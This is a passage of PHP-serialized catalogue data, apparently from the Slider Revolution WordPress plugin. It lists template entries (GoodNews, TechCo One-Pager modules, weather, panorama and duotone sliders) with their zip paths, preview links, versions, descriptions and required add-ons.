Testimonials\";s:5:\"alias\";s:20:\"goodnewstestimonials\";s:3:\"zip\";s:30:\"packs/goodnewstestimonials.zip\";s:3:\"uid\";s:32:\"606b7336e86f69c567542d3f43712b56\";s:3:\"img\";s:31:\"goodnewstestimonials/slide1.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:165;a:25:{s:2:\"id\";s:3:\"168\";s:5:\"title\";s:20:\"GoodNews Blog Footer\";s:5:\"alias\";s:18:\"goodnewsblogfooter\";s:3:\"zip\";s:28:\"packs/goodnewsblogfooter.zip\";s:3:\"uid\";s:32:\"1fb88aecfb116fde67ce8d52bd3b5f05\";s:3:\"img\";s:29:\"goodnewsblogfooter/slide1.jpg\";s:7:\"preview\";s:78:\"https://revolution.themepunch.com/goodnews-responsive-wordpress-theme-content/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:268:\"<span class=\"ttm_content\">The GoodNews One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"GoodNews Content Page\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"8\";s:9:\"installed\";b:0;}i:166;a:22:{s:2:\"id\";s:3:\"169\";s:5:\"title\";s:19:\"Before After Slider\";s:5:\"alias\";s:17:\"beforeafterslider\";s:3:\"zip\";s:21:\"beforeafterslider.zip\";s:3:\"uid\";s:32:\"6e615091a1fc3037c24b985ce5136fb2\";s:3:\"img\";s:28:\"beforeafterslider/slide1.jpg\";s:7:\"preview\";s:54:\"https://revolution.themepunch.com/before-after-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.4.3.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:201:\"<span class=\"ttm_content\">This is the example slider for our Before / After Add-On that allows you to create unique presentations with a comparing functionality.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:320:\"<span class=\"ttm_content\">How to install <a href=\"https://www.themepunch.com/slider-revolution/install-addons/\" target=\"_blank\">Add-Ons</a>.</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-beforeafter-addon\\/revslider-beforeafter-addon.php\",\"name\":\"Before After AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:167;a:22:{s:2:\"id\";s:3:\"170\";s:5:\"title\";s:16:\"Product Showcase\";s:5:\"alias\";s:15:\"productshowcase\";s:3:\"zip\";s:19:\"productshowcase.zip\";s:3:\"uid\";s:32:\"a43447670260aaa7e8ff66cedfddb57a\";s:3:\"img\";s:26:\"productshowcase/slide1.jpg\";s:7:\"preview\";s:68:\"https://revolution.themepunch.com/wordpress-product-showcase-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:165:\"<span class=\"ttm_content\">Looking to sell products effectively? Our product showcase slider is just what you are looking for!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:168;a:22:{s:2:\"id\";s:3:\"171\";s:5:\"title\";s:23:\"Overexposure Transition\";s:5:\"alias\";s:22:\"overexposuretransition\";s:3:\"zip\";s:26:\"overexposuretransition.zip\";s:3:\"uid\";s:32:\"13f16bbe6c6d646c7d0cb817a0d3d181\";s:3:\"img\";s:33:\"overexposuretransition/slide1.jpg\";s:7:\"preview\";s:65:\"https://revolution.themepunch.com/overexposure-transition-effect/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:155:\"<span class=\"ttm_content\">Subtle overexposure transitions and smooth color fade effects make this slider stand out.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:320:\"<span class=\"ttm_content\">How to install <a href=\"https://www.themepunch.com/slider-revolution/install-addons/\" target=\"_blank\">Add-Ons</a>.</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:169;a:22:{s:2:\"id\";s:3:\"172\";s:5:\"title\";s:15:\"Parallax Scroll\";s:5:\"alias\";s:14:\"parallaxscroll\";s:3:\"zip\";s:18:\"parallaxscroll.zip\";s:3:\"uid\";s:32:\"82546ee2f6af6c6682852f495109b3c3\";s:3:\"img\";s:25:\"parallaxscroll/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/parallax-scroll/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:148:\"<span class=\"ttm_content\">A strikingly colourful header for your website with super smooth parallax effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:170;a:25:{s:2:\"id\";s:3:\"173\";s:5:\"title\";s:24:\"TechCo One-Pager Package\";s:5:\"alias\";s:24:\"techco-one-pager-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:24:\"techco-one-pager-package\";s:3:\"img\";s:28:\"packages/techco_overview.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:3:{i:0;s:6:\"slider\";i:1;s:4:\"hero\";i:2;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:171;a:25:{s:2:\"id\";s:3:\"174\";s:5:\"title\";s:11:\"TechCo Menu\";s:5:\"alias\";s:11:\"techco-menu\";s:3:\"zip\";s:21:\"packs/techco-menu.zip\";s:3:\"uid\";s:32:\"55e5efee828cdf1ff7e2d3b90a301ea9\";s:3:\"img\";s:22:\"techco-menu/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:172;a:25:{s:2:\"id\";s:3:\"175\";s:5:\"title\";s:13:\"TechCo Header\";s:5:\"alias\";s:13:\"techco-header\";s:3:\"zip\";s:23:\"packs/techco-header.zip\";s:3:\"uid\";s:32:\"fb574d1376de9b1e408c91f51e6497d7\";s:3:\"img\";s:24:\"techco-header/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:173;a:25:{s:2:\"id\";s:3:\"176\";s:5:\"title\";s:12:\"TechCo About\";s:5:\"alias\";s:12:\"techco-about\";s:3:\"zip\";s:22:\"packs/techco-about.zip\";s:3:\"uid\";s:32:\"ba216da8231e55118d87e37d2358812c\";s:3:\"img\";s:23:\"techco-about/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:174;a:25:{s:2:\"id\";s:3:\"177\";s:5:\"title\";s:15:\"TechCo Services\";s:5:\"alias\";s:15:\"techco-services\";s:3:\"zip\";s:25:\"packs/techco-services.zip\";s:3:\"uid\";s:32:\"ef4a8ddbb5e1136133f7bc1227248e22\";s:3:\"img\";s:26:\"techco-services/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:175;a:25:{s:2:\"id\";s:3:\"178\";s:5:\"title\";s:12:\"TechCo Video\";s:5:\"alias\";s:12:\"techco-video\";s:3:\"zip\";s:22:\"packs/techco-video.zip\";s:3:\"uid\";s:32:\"d7bb92281d05f39f9bc9eca71f90e402\";s:3:\"img\";s:23:\"techco-video/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:176;a:25:{s:2:\"id\";s:3:\"179\";s:5:\"title\";s:13:\"TechCo Prices\";s:5:\"alias\";s:13:\"techco-prices\";s:3:\"zip\";s:23:\"packs/techco-prices.zip\";s:3:\"uid\";s:32:\"6291f404efbea12bb181352aba71ef11\";s:3:\"img\";s:24:\"techco-prices/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:177;a:25:{s:2:\"id\";s:3:\"180\";s:5:\"title\";s:19:\"TechCo Testimonials\";s:5:\"alias\";s:19:\"techco-testimonials\";s:3:\"zip\";s:29:\"packs/techco-testimonials.zip\";s:3:\"uid\";s:32:\"3460bd51f6b80599266fecb7fbb918be\";s:3:\"img\";s:30:\"techco-testimonials/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:178;a:25:{s:2:\"id\";s:3:\"181\";s:5:\"title\";s:13:\"TechCo Footer\";s:5:\"alias\";s:13:\"techco-footer\";s:3:\"zip\";s:23:\"packs/techco-footer.zip\";s:3:\"uid\";s:32:\"640abcd549137520461a4a71ff758a3b\";s:3:\"img\";s:24:\"techco-footer/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/techco-one-page-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.1.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:266:\"<span class=\"ttm_content\">The TechCo One-Pager template pack is a fantastic solution if you want to get a simple website going fast. Use all modules at once as seen in the preview or pick individual modules for usage anywhere!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:16:\"TechCo One-Pager\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"9\";s:9:\"installed\";b:0;}i:179;a:22:{s:2:\"id\";s:3:\"182\";s:5:\"title\";s:12:\"Live Weather\";s:5:\"alias\";s:7:\"weather\";s:3:\"zip\";s:11:\"weather.zip\";s:3:\"uid\";s:32:\"aab92e69374e4c7b8c6741fe02e574b9\";s:3:\"img\";s:18:\"weather/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/wordpress-live-weather-add-on/\";s:7:\"version\";s:5:\"1.0.3\";s:8:\"required\";s:7:\"5.4.5.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:173:\"<span class=\"ttm_content\">Showcasing our weather add-on, this slider show a different cities temperatures and forecast on each slide.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:168:\"[{\"path\":\"revslider-weather-addon\\/revslider-weather-addon.php\",\"name\":\"Live Weather Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:180;a:22:{s:2:\"id\";s:3:\"183\";s:5:\"title\";s:17:\"360 Panorama Tour\";s:5:\"alias\";s:11:\"360panorama\";s:3:\"zip\";s:15:\"360panorama.zip\";s:3:\"uid\";s:32:\"332720fdacdbb38f65e8327a2a96c52d\";s:3:\"img\";s:22:\"360panorama/slide1.jpg\";s:7:\"preview\";s:70:\"https://revolution.themepunch.com/360-degree-real-estate-virtual-tour/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.4.5.2\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:155:\"<span class=\"ttm_content\">An example template for our Panorama 360 tour add-on, created for the real estate market.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:165:\"[{\"path\":\"revslider-panorama-addon\\/revslider-panorama-addon.php\",\"name\":\"Panorama AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:181;a:22:{s:2:\"id\";s:3:\"184\";s:5:\"title\";s:14:\"Duotone Add-on\";s:5:\"alias\";s:14:\"duotone-add-on\";s:3:\"zip\";s:18:\"duotone-add-on.zip\";s:3:\"uid\";s:32:\"a428c6f363b3146e96d20a6f44958922\";s:3:\"img\";s:25:\"duotone-add-on/slide1.jpg\";s:7:\"preview\";s:66:\"https://revolution.themepunch.com/wordpress-duotone-effect-add-on/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.4.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:168:\"<span class=\"ttm_content\">This example template showcases 3 of the 30 Duotone filters available in our brand new Duotone Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:350:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect 